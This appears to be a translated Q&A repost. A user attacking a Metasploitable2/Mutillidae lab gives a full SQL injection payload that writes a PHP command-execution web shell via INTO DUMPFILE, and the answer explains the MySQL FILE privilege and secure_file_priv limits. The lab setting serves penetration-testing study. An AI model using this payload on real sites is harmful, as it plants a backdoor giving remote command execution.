[英]I need some help sql injection
我目前正在使用 php 后門程序在我的本地服務器(metasploitable2 mutillidate)上植入 php 文件。 我找出了它有多少列並制作了一個簡單的代碼。
' UNION SELECT null, null, null, null, '<?php if(isset($_REQUEST["cmd"])){
echo "<pre>"; $cmd = ($_REQUEST["cmd"]); system($cmd); echo "</pre>"; die;
}?>' INTO DUMPFILE '/var/www/mutillidae/backdoor.php' --
我將此代碼編碼為 url 表單並提交,但我失敗了。
它給了我與到目前為止不同的錯誤,但仍然不起作用。
錯誤說:'執行查詢時出錯:無法創建/寫入文件'/var/www/mutillidae/backdoor.php'
我想這與特權有關,但我不確定
執行查詢的 MySQL 用戶必須具有FILE
權限才能使用SELECT ... INTO OUTFILE
或SELECT ... INTO DUMPFILE
。 此外,如果將secure_file_priv
系統變量設置為目錄的路徑名,則您只能寫入該目錄中的文件。
聲明:本站的技術帖子網頁,遵循CC BY-SA 4.0協議,如果您需要轉載,請注明本站網址或者原文地址。任何問題請咨詢:yoyou2525@163.com.